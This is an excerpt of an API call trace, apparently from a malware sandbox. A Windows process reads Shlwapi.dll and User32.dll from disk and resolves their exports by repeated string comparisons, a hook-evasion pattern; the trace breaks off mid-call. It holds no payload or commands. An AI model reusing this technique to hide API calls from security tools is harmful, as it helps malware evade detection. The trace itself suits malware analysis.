lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0147.310] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0147.313] GetProcessHeap () returned 0x470000 [0147.313] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x470000) returned 1 [0147.313] GetProcessHeap () returned 0x470000 [0147.313] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489b70 [0147.314] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0147.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0147.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0147.315] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0147.315] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0147.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0147.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0147.315] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0147.315] GetProcessHeap () returned 0x470000 [0147.315] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x51148) returned 0x2d95030 [0147.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0147.316] ReadFile (in: hFile=0x17c, lpBuffer=0x2d95030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d95030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0147.320] CloseHandle (hObject=0x17c) returned 1 [0147.320] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0147.320] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0147.320] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0147.320] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0147.320] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0147.320] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0147.320] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0147.320] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0147.321] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0147.321] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0147.321] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0147.322] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0147.322] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0147.414] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0147.414] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0147.414] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0147.414] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0147.415] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0147.415] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0147.415] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0147.415] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0147.416] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0147.416] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0147.416] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0147.416] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0147.416] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0147.416] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0147.416] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0147.416] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0147.417] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0147.417] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0147.417] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0147.417] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0147.418] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0147.418] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0147.418] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0147.419] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0147.420] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0147.420] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0147.431] GetProcessHeap () returned 0x470000 [0147.431] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x470000) returned 1 [0147.431] GetProcessHeap () returned 0x470000 [0147.431] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489c30 [0147.431] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0147.431] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0147.431] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0147.431] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0147.431] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 